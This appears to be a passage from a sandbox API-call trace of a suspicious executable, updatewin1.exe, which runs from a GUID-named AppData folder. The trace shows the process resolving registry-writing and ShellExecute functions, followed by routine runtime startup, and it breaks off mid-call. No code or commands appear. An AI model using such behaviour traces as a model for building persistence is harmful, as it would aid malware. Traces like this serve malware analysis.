LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0165.107] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0165.107] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0165.107] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0165.107] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0165.108] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0165.108] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0165.108] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0165.108] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0165.108] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.108] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0165.108] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0165.108] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0165.108] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0165.108] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0165.108] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0165.116] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0165.116] atexit (param_1=0x4f63d8) returned 0 [0165.116] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x196be020, dwHighDateTime=0x1d69ad5)) [0165.116] GetCurrentThreadId () returned 0x790 [0165.116] GetCurrentProcessId () returned 0xacc [0165.116] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=28499652421) returned 1 [0165.116] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0165.116] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0165.116] GetLastError () returned 0x57 [0165.116] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0165.116] GetLastError () returned 0x57 [0165.116] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0165.117] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0165.117] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0165.117] GetLastError () returned 0x57 [0165.117] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0165.117] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0165.117] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0165.117] GetLastError () returned 0x57 [0165.117] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0165.117] GetLastError () returned 0x57 [0165.117] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0165.117] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0165.117] GetProcessHeap () returned 0x4e0000 [0165.118] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0165.118] GetLastError () returned 0x57 [0165.118] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0165.118] GetLastError () returned 0x57 [0165.118] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0165.118] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x364) returned 0x50a9e8 [0165.118] SetLastError (dwErrCode=0x57) [0165.118] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xc00) returned 0x50ad58 [0165.120] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0xba52fdc6, hStdError=0xfffffffe)) [0165.120] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0165.120] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0165.120] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0165.120] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe\" " [0165.120] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe\" " [0165.120] IsValidCodePage (CodePage=0x4e4) returned 1 [0165.120] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0165.120] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0165.120] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0165.120] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0165.120] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0165.120] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0165.120] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0165.120] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0165.120] GetLastError () returned 0x57 [0165.120] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0165.120] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0165.120] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0165.120] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1eX\x0bºHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0165.120] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0165.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0165.121] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0165.121] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0165.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1eX\x0bºHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x80) returned 0x50a0d0 [0165.121] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe")) returned 0x5f [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xc8) returned 0x50c160 [0165.121] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0165.121] GetLastError () returned 0x0 [0165.121] GetEnvironmentStringsW () returned 0x50c230* [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xaca) returned 0x50cd08 [0165.121] FreeEnvironmentStringsW (penv=0x50c230) returned 1 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x98) returned 0x50c230 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3e) returned 0x50d7f8 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x6c) returned 0x50c2d0 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x6e) returned 0x50c348 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x78) returned 0x4f1180 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x62) returned 0x50c3c0 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f52d0 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x50c430 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x28) returned 0x50a158 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1a) returned 0x50bd10 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x4a) returned 0x50c480 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x72) returned 0x4f1200 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f5308 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f5340 [0165.121] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1c) returned 0x50bd38 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xd2) returned 0x50c4d8 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x7c) returned 0x50c5b8 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x50c640 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3a) returned 0x50d840 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x90) returned 0x50c680 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x50c718 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f5378 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x36) returned 0x50c748 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x50c788 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x50c7d8 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x50d888 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x82) returned 0x50c838 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4f53b0 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1e) returned 0x50bd60 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2c) returned 0x4f53e8 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x50c8c8 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x52) returned 0x50c928 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2a) returned 0x4f5420 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x50d8d0 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x54) returned 0x50c988 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x50c9e8 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x30) returned 0x4f5458 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x8c) returned 0x50ca18 [0165.122] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50cd08 | out: hHeap=0x4e0000) returned 1 [0165.122] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x800) returned 0x50cab0 [0165.122] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0165.122] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0165.122] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0165.122] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe\" " [0165.123] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS 